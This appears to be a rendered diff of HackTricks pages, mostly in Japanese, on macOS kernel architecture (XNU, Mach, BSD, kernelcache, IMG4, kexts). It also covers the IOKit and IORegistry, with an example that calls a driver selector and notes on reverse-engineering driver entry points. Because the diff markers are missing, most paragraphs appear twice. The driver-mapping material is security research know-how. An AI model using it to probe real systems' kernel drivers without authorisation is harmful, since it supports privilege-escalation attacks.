# macOS カーネル & システム拡張
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**PEASSファミリー**](https://opensea.io/collection/the-peass-family)を発見する。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
* **HackTricks で企業を宣伝**したい場合や **HackTricks を PDF でダウンロード**したい場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式 PEASS & HackTricks スワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [Discord グループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegram グループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローする
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の github リポジトリに PR を提出して、あなたのハッキングテクニックを共有する
</details>
## XNUカーネル
## XNU カーネル
**macOSの核心はXNU**で、「X is Not Unix」を意味します。このカーネルは、**Machマイクロカーネル**後で議論されるとBerkeley Software Distribution**BSD**の要素から構成されています。XNUはまた、**I/O Kitと呼ばれるシステムを介してカーネルドライバーのプラットフォームを提供します**。XNUカーネルはDarwinオープンソースプロジェクトの一部であり、**そのソースコードは自由にアクセス可能です**
**macOS のコア**は **XNU** で構成されており、「X is Not Unix」の略です。このカーネルは基本的に **Mach マイクロカーネル**(後述します)と **Berkeley Software Distribution (BSD)** の要素から構成されています。XNU はまた、**I/O Kit というシステムを介してカーネルドライバを提供**しています。XNU カーネルは **Darwin オープンソースプロジェクト**の一部であり、**そのソースコードは自由にアクセス可能**です。
セキュリティ研究者やUnix開発者の視点から見ると、**macOS**は洗練されたGUIとカスタムアプリケーションのホストを備えた**FreeBSD**システムに非常に**似ている**と感じることがあります。BSD用に開発されたほとんどのアプリケーションは、Unixユーザに馴染みのあるコマンドラインツールがmacOSにすべて存在するため、変更を加えることなくmacOSでコンパイルして実行できます。しかし、XNUカーネルがMachを組み込んでいるため、従来のUnixライクなシステムとmacOSの間にはいくつかの重要な違いがあり、これらの違いが潜在的な問題を引き起こしたり、ユニークな利点を提供したりすることがあります。
セキュリティ研究者や Unix 開発者の観点から見ると、**macOS**は、エレガントな GUI と多くのカスタムアプリケーションを備えた **FreeBSD** システムにかなり **似て**いると感じるかもしれません。BSD 向けに開発されたほとんどのアプリケーションは、Unix ユーザにとって馴染みのあるコマンドラインツールが macOS にすべて備わっているため、修正を加えることなく macOS でコンパイルおよび実行できます。ただし、XNU カーネルには Mach が組み込まれているため、従来の Unix ライクなシステムと macOS の間にはいくつかの重要な違いがあり、これらの違いは潜在的な問題を引き起こすか、独自の利点を提供する可能性があります。
XNUのオープンソースバージョン: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/)
XNU のオープンソース版: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/)
### Mach
Machは**UNIX互換**を目指して設計された**マイクロカーネル**です。その主要な設計原則の一つは、**カーネル**空間で実行される**コード**の量を**最小限**にし、ファイルシステム、ネットワーキング、I/Oなどの典型的なカーネル機能を**ユーザーレベルのタスクとして実行することを可能にすることでした**
Mach**UNIX 互換**の **マイクロカーネル**です。その主要な設計原則の1つは、**カーネルスペースで実行されるコードの量を最小限に抑え**、ファイルシステム、ネットワーキング、I/O などの多くの典型的なカーネル機能を **ユーザレベルのタスクとして実行**できるようにすることでした
XNUでは、Machはプロセッサのスケジューリング、マルチタスキング、仮想メモリ管理など、カーネルが通常扱う多くの重要な低レベルの操作を**担当しています**
XNU では、Mach が **プロセッサスケジューリング、マルチタスキング、および仮想メモリ管理**など、通常カーネルが処理する多くの重要な低レベル操作を担当しています
### BSD
XNU**カーネル**は、**FreeBSD**プロジェクトから派生した大量のコードも**組み込んでいます**。このコードはMachと共に、同じアドレス空間内でカーネルの一部として**実行されます**。ただし、XNU内のFreeBSDコードは、Machとの互換性を確保するために必要な変更が加えられているため、元のFreeBSDコードとは大きく異なる場合があります。FreeBSDは多くのカーネル操作に貢献しており、以下を含みます
XNU カーネルはまた、**FreeBSD** プロジェクトから派生したコードのかなりの量を **組み込んで**います。このコードは、**Mach とともにカーネルの一部として実行**されます。ただし、XNU 内の FreeBSD コードは、Mach との互換性を確保するために変更が加えられたため、元の FreeBSD コードとは大きく異なる場合があります。FreeBSD は以下の多くのカーネル操作に貢献しています:
* プロセス管理
* シグナル処理
* 基本的なセキュリティメカニズム、ユーザーとグループの管理を含む
* ユーザとグループの管理を含む基本的なセキュリティメカニズム
* システムコールインフラストラクチャ
* TCP/IPスタックとソケット
* TCP/IP スタックとソケット
* ファイアウォールとパケットフィルタリング
BSDとMachの相互作用を理解することは、それらの異なる概念フレームワークのために複雑になることがあります。例えば、BSDはプロセスを基本的な実行単位として使用するのに対し、Machはスレッドに基づいて操作します。この違いは、XNUでは**各BSDプロセスを正確に1つのMachスレッドを含むMachタスクに関連付けることで調整されます**。BSDのfork()システムコールが使用されると、カーネル内のBSDコードはMach関数を使用してタスクとスレッド構造を作成します。
BSD と Mach の相互作用を理解することは複雑であり、それぞれ異なる概念フレームワークを持っているためです。たとえば、BSD はプロセスを基本的な実行単位として使用しますが、Mach はスレッドに基づいて動作します。この相違は、XNU において BSD プロセスを Mach タスクに **関連付け**し、正確に1つの Mach スレッドを含むようにすることで調整されます。BSD の fork() システムコールが使用されると、カーネル内の BSD コードはタスクとスレッド構造を作成するために Mach 関数を使用します。
さらに、**MachとBSDはそれぞれ異なるセキュリティモデルを維持しています****Machの**セキュリティモデルは**ポート権限**に基づいているのに対し、BSDのセキュリティモデルは**プロセス所有権**に基づいて操作します。これら2つのモデル間の不一致は、時折ローカル特権昇格の脆弱性を引き起こしてきました。典型的なシステムコールに加えて、**ユーザースペースのプログラムがカーネルと対話するためのMachトラップもあります**。これらの異なる要素が合わさって、macOSカーネルの多面的でハイブリッドなアーキテクチャを形成しています。
さらに、**Mach BSD はそれぞれ異なるセキュリティモデルを維持**しています: **Mach** のセキュリティモデルは **ポート権限**に基づいており、一方、BSD のセキュリティモデルは **プロセス所有権**に基づいて動作します。これら2つのモデルの相違は、場合によってはローカル特権昇格の脆弱性を引き起こすことがあります。典型的なシステムコールに加えて、**Mach トラップ**もあり、ユーザスペースプログラムがカーネルとやり取りすることを可能にします。これらの異なる要素が組み合わさり、macOS カーネルの多面的でハイブリッドなアーキテクチャを形成しています。
### I/O Kit - ドライバ
### I/O Kit - ドライバ
I/O KitはXNUカーネルのオープンソースでオブジェクト指向の**デバイスドライバーフレームワーク**であり、**動的にロードされるデバイスドライバー**の追加と管理を担当しています。これらのドライバーは、例えば異なるハードウェアで使用するためにカーネルに動的に追加されるモジュラーコードを可能にします。
I/O Kit は XNU カーネル内のオープンソースのオブジェクト指向 **デバイスドライバフレームワーク**であり、**動的にロードされるデバイスドライバ**を処理します。これにより、多様なハードウェアをサポートするために、モジュラーコードをカーネルに即座に追加できます。
{% content-ref url="macos-iokit.md" %}
[macos-iokit.md](macos-iokit.md)
@ -59,28 +59,28 @@ I/O KitはXNUカーネルのオープンソースでオブジェクト指向の*
### カーネルキャッシュ
**カーネルキャッシュ**は、XNUカーネルの**事前にコンパイルされ、事前にリンクされたバージョン**であり、重要なデバイス**ドライバー**と**カーネル拡張**も含まれています。圧縮された形式で保存され、ブートアッププロセス中にメモリに解凍されます。カーネルキャッシュは、カーネルと重要なドライバーの準備ができたバージョンを利用可能にすることで、ブート時にこれらのコンポーネントを動的にロードしてリンクするためにかかる時間とリソースを削減し、**より高速なブート時間**を実現します。
**カーネルキャッシュ**は、XNU カーネルの **事前にコンパイルおよびリンクされたバージョン**と、必須のデバイス **ドライバ****カーネル拡張** を含んでいます。これは **圧縮**形式で保存され、起動時にメモリに展開されます。カーネルキャッシュにより、カーネルと重要なドライバの準備が整った状態が利用可能になるため、起動時にこれらのコンポーネントを動的にロードおよびリンクするために費やされる時間とリソースが削減され、**より高速な起動時間**が実現されます。
iOSでは**`/System/Library/Caches/com.apple.kernelcaches/kernelcache`**に位置していますが、macOSでは**`find / -name kernelcache 2>/dev/null`**で見つけることができます。
iOS では**`/System/Library/Caches/com.apple.kernelcaches/kernelcache`** にあり、macOS では **`find / -name kernelcache 2>/dev/null`** で見つけることができます。
#### IMG4
IMG4ファイル形式は、AppleがiOSおよびmacOSデバイスでファームウェアコンポーネント**カーネルキャッシュ**など)を安全に**保存および検証するために使用するコンテナ形式**です。IMG4形式にはヘッダーと、実際のペイロードカーネルやブートローダーなど、署名、およびマニフェストプロパティのセットをカプセル化するいくつかのタグが含まれています。この形式は暗号化検証をサポートしており、デバイスは実行する前にファームウェアコンポーネントの真正性と完全性を確認できます。
IMG4 ファイル形式は、Apple が iOS および macOS デバイスで使用する **ファームウェアコンポーネント(カーネルキャッシュなど)**を **安全に保存および検証**するために使用されるコンテナ形式です。IMG4 形式には、ヘッダーと複数のタグが含まれており、実際のペイロード(カーネルやブートローダなど)、署名、および一連のマニフェストプロパティをカプセル化しています。この形式は暗号的な検証をサポートしており、デバイスがファームウェアコンポーネントの真正性と整合性を実行する前に確認できます。
通常、以下のコンポーネントで構成されています
通常、以下のコンポーネントで構成されています:
* **ペイロードIM4P**
* しばしば圧縮されていますLZFSE4、LZSS、…
* オプションで暗号化されています
* **マニフェストIM4M**
* 署名が含まれています
* 追加のキー/値辞書
* **リストア情報IM4R**
* APNonceとしても知られています
* 一部のアップデートのリプレイを防ぎます
* オプション通常、これは見つかりません
* **ペイロード (IM4P)**:
* しばしば圧縮されていますLZFSE4、LZSS など
* オプションで暗号化されてい
* **マニフェスト (IM4M)**:
* 署名を含む
* 追加のキー/値辞書
* **リストア情報 (IM4R)**:
* APNonce としても知られています
* 一部の更新の再生を防止します
* オプション: 通常、これは見つかりません
カーネルキャッシュを解凍する:
カーネルキャッシュの展開:
```bash
# pyimg4 (https://github.com/m1stadev/PyIMG4)
pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
@ -90,14 +90,14 @@ img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
```
#### カーネルキャッシュシンボル
時々Appleは**シンボル**を含む**カーネルキャッシュ**をリリースします。シンボル付きのファームウェアをダウンロードするには、[https://theapplewiki.com](https://theapplewiki.com/)のリンクをたどます。
時々、Appleは**シンボル**付きの**カーネルキャッシュ**をリリースします。[https://theapplewiki.com](https://theapplewiki.com/)のリンクをたどることで、いくつかのファームウェアにシンボルが付いているものをダウンロードできます。
### IPSW
これらは[**https://ipsw.me/**](https://ipsw.me/)からダウンロードできるAppleの**ファームウェア**です。他のファイルの中に**カーネルキャッシュ**が含まれています。\
ファイルを**抽出**するには、単に**解凍**します。
これらはAppleの**ファームウェア**で、[**https://ipsw.me/**](https://ipsw.me/)からダウンロードできます。他のファイルの中には**カーネルキャッシュ**が含まれています。\
ファイルを**抽出**するには、単に**解凍**するだけです。
ファームウェアを抽出すると、**`kernelcache.release.iphone14`**のようなファイルが得られます。これは**IMG4**形式で、興味深い情報を抽出するには以下を使用します:
ファームウェアを抽出した後、次のようなファイルが得られます: **`kernelcache.release.iphone14`**。これは**IMG4**形式で、興味深い情報を抽出するには以下を使用できます:
* [**pyimg4**](https://github.com/m1stadev/PyIMG4)
@ -111,11 +111,9 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon
```bash
img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
```
```markdown
シンボルをチェックするには、以下のコマンドを使用します: **`nm -a kernelcache.release.iphone14.e | wc -l`**
以下のコマンドを使用して、抽出されたkernelcacheのシンボルを確認できます: **`nm -a kernelcache.release.iphone14.e | wc -l`**
これで、**すべての拡張機能を抽出する**か、または**興味のある特定の拡張機能を抽出する**ことができます:
```
これで、**すべての拡張機能**または**興味のある拡張機能**を抽出できます:
```bash
# List all extensions
kextex -l kernelcache.release.iphone14.e
@ -128,17 +126,17 @@ kextex_all kernelcache.release.iphone14.e
# Check the extension for symbols
nm -a binaries/com.apple.security.sandbox | wc -l
```
## macOS カーネル拡張
## macOSカーネル拡張機能
macOSはカーネル拡張(.kextの読み込みに対して**非常に制限的**です。これはコードが高い権限で実行されるためです。実際、デフォルトではバイパスが見つからない限り、ほぼ不可能です。
macOSは**カーネル拡張機能**.kextを読み込むことが非常に制限されています。これは、そのコードが実行される高い特権のためです。実際、デフォルトでは回避策が見つかるまでほぼ不可能です。
{% content-ref url="macos-kernel-extensions.md" %}
[macos-kernel-extensions.md](macos-kernel-extensions.md)
{% endcontent-ref %}
### macOS システム拡張
### macOSシステム拡張機能
カーネル拡張の使用を避けるために、macOSはシステム拡張を作成しました。これにより、開発者はカーネルと対話するためのユーザーレベルのAPIを提供します。
macOSはカーネル拡張機能の代わりにシステム拡張機能を作成しました。これにより、開発者はカーネル拡張機能を使用せずにカーネルとやり取りするためのユーザーレベルのAPIを提供します。
{% content-ref url="macos-system-extensions.md" %}
[macos-system-extensions.md](macos-system-extensions.md)
@ -151,14 +149,14 @@ macOSはカーネル拡張.kextの読み込みに対して**非常に制
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください
</details>

76
macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
View file

@ -4,25 +4,25 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **Are you working in a cybersecurity company? Do you want to see your company advertised on HackTricks? Or do you want to have access to the latest version of PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!**
* **Are you working in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want to have access to the latest version of PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!**
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our exclusive collection of [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS and HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) **Discord group** or the [**telegram group**](https://t.me/peass) or **follow me** on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) **Discord group** or the [**telegram group**](https://t.me/peass) or **follow me** on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Share your hacking tricks by sending PR to** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## 基本情報
## Basic Information
I/O Kitは、XNUカーネル内のオープンソースのオブジェクト指向の**デバイスドライバフレームワーク**であり、**動的にロードされるデバイスドライバ**の追加と管理を担当しています。これらのドライバは、異なるハードウェアとの使用に動的にカーネルにモジュールコードを追加するために使用されます。
The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware.
IOKitドライバは基本的にカーネルから関数を**エクスポート**します。これらの関数のパラメータ**型**は**事前に定義**され、検証されます。さらに、XPCと同様に、IOKitはMachメッセージの**上位レイヤー**です。
IOKit drivers will basically **export functions from the kernel**. These function parameter **types** are **predefined** and are verified. Moreover, similar to XPC, IOKit is just another layer on **top of Mach messages**.
**IOKit XNUカーネルコード**は、Appleによって[https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit)でオープンソース化されています。また、ユーザースペースのIOKitコンポーネントもオープンソースです[https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser)。
**IOKit XNU kernel code** is opensourced by Apple in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Moreover, the user space IOKit components are also opensource [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser).
ただし、**IOKitドライバはオープンソースではありません**。とはいえ、時折、ドライバのリリースにはデバッグを容易にするシンボルが付属していることがあります。[**ここからファームウェアからドライバ拡張を取得する方法**](./#ipsw)**を確認してください。**
However, **no IOKit drivers** are opensource. Anyway, from time to time a release of a driver might come with symbols that makes it easier to debug it. Check how to [**get the driver extensions from the firmware here**](./#ipsw)**.**
これは**C++**で書かれています。C++のデマングルされたシンボルを取得するには、以下のコマンドを使用します:
It's written in **C++**. You can get demangled C++ symbols with:
```bash
# Get demangled symbols
nm -C com.apple.driver.AppleJPEGDriver
@ -33,7 +33,7 @@ __ZN16IOUserClient202222dispatchExternalMethodEjP31IOExternalMethodArgumentsOpaq
IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*)
```
{% hint style="danger" %}
IOKitの**公開された関数**は、クライアントが関数を呼び出そうとする際に**追加のセキュリティチェック**を実行することができますが、アプリは通常、IOKit関数とのやり取りができる**サンドボックス**に制限されていることに注意してください。
IOKitの**公開された関数**は、クライアントが関数を呼び出そうとする際に**追加のセキュリティチェック**を実行する可能性がありますが、アプリは通常、IOKit関数とやり取りできる**サンドボックス**によって**制限**されていることに注意してください。
{% endhint %}
## ドライバー
@ -43,7 +43,7 @@ macOSでは、次の場所にあります。
* **`/System/Library/Extensions`**
* OS Xオペレーティングシステムに組み込まれたKEXTファイル。
* **`/Library/Extensions`**
* サードパーティソフトウェアによってインストールされたKEXTファイル
* サードパーティソフトウェアによってインストールされたKEXTファイル
iOSでは、次の場所にあります。
@ -65,48 +65,48 @@ Index Refs Address Size Wired Name (Version) UUID <Linked
9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5>
10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1>
```
9までの番号のドライバは、**アドレス0にロードされます**。これは、それらが実際のドライバではなく、**カーネルの一部であり、アンロードすることはできません**
1. 9までの番号のドライバは、**アドレス0にロードされます**。これは、それらが実際のドライバではなく、**カーネルの一部であり、アンロードできない**ことを意味します
特定の拡張機能を見つけるためには、次の方法を使用できます:
```bash
kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id
kextfind -bundle-id -substring IOR #Search by substring in bundle-id
```
カーネル拡張機能をロードおよびアンロードするには、次の手順を実行します:
カーネル拡張機能をロードおよびアンロードするには次のようにします:
```bash
kextload com.apple.iokit.IOReportFamily
kextunload com.apple.iokit.IOReportFamily
```
## IORegistry
**IORegistry**は、macOSおよびiOSのIOKitフレームワークの重要な部分であり、システムのハードウェア構成と状態を表すデータベースとして機能します。これは、システムにロードされたすべてのハードウェアとドライバを表すオブジェクトの階層的なコレクションであり、それらの関係を示しています。
**IORegistryIOレジストリ**は、macOSとiOSのIOKitフレームワークの重要な部分であり、システムのハードウェア構成と状態を表すデータベースとして機能します。これは、システムにロードされたすべてのハードウェアとドライバを表すオブジェクトの階層的なコレクションであり、それらの関係を示しています。
コンソールからIORegistryを調査するために、cliの**`ioreg`**を使用することができます特にiOSには便利です
**`ioreg`**コマンドラインインターフェース特にiOS向けに特に便利を使用して、コンソールからIORegistryを取得できます
```bash
ioreg -l #List all
ioreg -w 0 #Not cut lines
ioreg -p <plane> #Check other plane
```
**`IORegistryExplorer`**を[**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/)から**Xcode Additional Tools**をダウンロードして、**グラフィカル**インターフェースを通じて**macOS IORegistry**を調査することができます。
**IORegistryExplorer**を[**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/)から**Xcode追加ツール**をダウンロードして、**グラフィカル**インターフェースを通じて**macOS IORegistry**を調査できます。
<figure><img src="../../../.gitbook/assets/image (695).png" alt="" width="563"><figcaption></figcaption></figure>
IORegistryExplorerでは、"planes"が使用され、IORegistry内の異なるオブジェクト間の関係を整理して表示します。各planeは、特定の関係のタイプまたはシステムのハードウェアとドライバの構成の特定のビューを表します。以下は、IORegistryExplorerで遭遇する可能性のある一部の一般的なplaneです:
IORegistryExplorerでは、「プレーン」が使用され、IORegistry内の異なるオブジェクト間の関係を整理して表示します。各プレーンは、特定の関係の種類またはシステムのハードウェアおよびドライバー構成の特定のビューを表します。以下は、IORegistryExplorerで遭遇する可能性のある一般的なプレーンのいくつかです:
1. **IOService Plane**: これは最も一般的なplaneで、ドライバとnubドライバ間の通信チャネル)を表すサービスオブジェクトを表示します。これにより、これらのオブジェクト間のプロバイダー-クライアントの関係が表示されます。
2. **IODeviceTree Plane**: このplaneは、デバイスがシステムに接続される際の物理的な接続を表します。USBやPCIなどのバスを介して接続されたデバイスの階層を視覚化するためによく使用されます。
3. **IOPower Plane**: 電源管理の観点からオブジェクトとその関係を表示します。他のオブジェクトの電源状態に影響を与えているオブジェクトを表示することができ、電源に関連する問題のデバッグに役立ちます。
4. **IOUSB Plane**: USBデバイスとその関係に特化し、USBハブと接続されたデバイスの階層を表示します。
5. **IOAudio Plane**: このplaneは、システム内のオーディオデバイスとその関係を表します。
1. **IOService Plane**:これは最も一般的なプレーンで、ドライバーとナブ(ドライバー間の通信チャンネル)を表すサービスオブジェクトを表示します。これらのオブジェクト間のプロバイダー-クライアントの関係を示します。
2. **IODeviceTree Plane**:このプレーンは、デバイスがシステムに接続される際の物理的な接続を表します。USBやPCIなどのバスを介して接続されたデバイスの階層構造を視覚化するためによく使用されます。
3. **IOPower Plane**電源管理の観点からオブジェクトとその関係を表示します。他のオブジェクトの電源状態に影響を与えているオブジェクトを示すことができ、電力関連の問題のデバッグに役立ちます。
4. **IOUSB Plane**USBデバイスとその関係に特化し、USBハブと接続されたデバイスの階層構造を表示します。
5. **IOAudio Plane**:このプレーンは、システム内のオーディオデバイスとそれらの関係を表すためのものです。
6. ...
## ドライバ通信コード例
## ドライバ通信コード例
以下のコードは、IOKitサービス`"YourServiceNameHere"`に接続し、セレクター0内の関数を呼び出します。具体的には
次のコードは、IOKitサービス`"YourServiceNameHere"`に接続し、セレクタ0内の関数を呼び出します。これには以下の手順が含まれます
* 最初に、**`IOServiceMatching`**と**`IOServiceGetMatchingServices`**を呼び出してサービスを取得します。
* まず、**`IOServiceMatching`**と**`IOServiceGetMatchingServices`**を呼び出してサービスを取得します。
* 次に、**`IOServiceOpen`**を呼び出して接続を確立します。
* 最後に、**`IOConnectCallScalarMethod`**を使用してセレクタ0セレクタは呼び出したい関数に割り当てられた番号です)を指定して関数を呼び出します
* 最後に、**`IOConnectCallScalarMethod`**を使用してセレクタ0を指定して関数を呼び出します(セレクタは呼び出したい関数に割り当てられた番号です)。
```objectivec
#import <Foundation/Foundation.h>
#import <IOKit/IOKitLib.h>
@ -161,19 +161,19 @@ IOObjectRelease(iter);
return 0;
}
```
**他の**関数もありますが、**`IOConnectCallScalarMethod`**のようなIOKit関数を呼び出すために使用できるものには、**`IOConnectCallMethod`**、**`IOConnectCallStructMethod`**などがあります...
他の**`IOConnectCallScalarMethod`**のようにIOKit関数を呼び出すために使用できる関数があります**`IOConnectCallMethod`**、**`IOConnectCallStructMethod`**...
## ドライバーエントリーポイントのリバースエンジニアリング
これらは、たとえば[**ファームウェアイメージipsw**](./#ipsw)から取得することができます。それから、お気に入りのデコンパイラにロードします。
これらは、たとえば[**ファームウェアイメージipsw**](./#ipsw)から取得できます。次に、お気に入りのデコンパイラにロードします。
次に、呼び出しを受け取り、正しい関数を呼び出すドライバー関数である**`externalMethod`**関数の逆コンパイルを開始できます。
**`externalMethod`**関数の逆コンパイルを開始できます。これは、呼び出しを受け取り正しい関数を呼び出すドライバー関数です:
<figure><img src="../../../.gitbook/assets/image (696).png" alt="" width="315"><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (697).png" alt=""><figcaption></figcaption></figure>
その酷い呼び出しのデマングルは次のような意味です:
その酷い呼び出しは次のようになります:
{% code overflow="wrap" %}
```cpp
@ -181,7 +181,7 @@ IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArguments
```
{% endcode %}
前の定義では、**`self`** パラメータが抜けていることに注意してください。正しい定義は次のようになります:
前の定義では、**`self`** パラメータが抜けていることに注意してください。適切な定義は次のようになります:
{% code overflow="wrap" %}
```cpp
@ -189,13 +189,13 @@ IOUserClient2022::dispatchExternalMethod(self, unsigned int, IOExternalMethodArg
```
{% endcode %}
実際には、[https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388)で実際の定義を見つけることができます。
実際には、[https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388) で実際の定義を見つけることができます。
```cpp
IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgumentsOpaque *arguments,
const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount,
OSObject * target, void * reference)
```
この情報を使って、Ctrl+Right -> `Edit function signature` を書き換え、既知の型を設定することができます:
この情報を使って、Ctrl+Right -> `Edit function signature` を書き直し、既知のタイプを設定します:
<figure><img src="../../../.gitbook/assets/image (702).png" alt=""><figcaption></figcaption></figure>
@ -203,11 +203,11 @@ OSObject * target, void * reference)
<figure><img src="../../../.gitbook/assets/image (703).png" alt=""><figcaption></figcaption></figure>
次のステップでは、**`IOExternalMethodDispatch2022`** 構造体を定義する必要があります。これはオープンソースであり、[https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176) で定義されています。以下のように定義することができます:
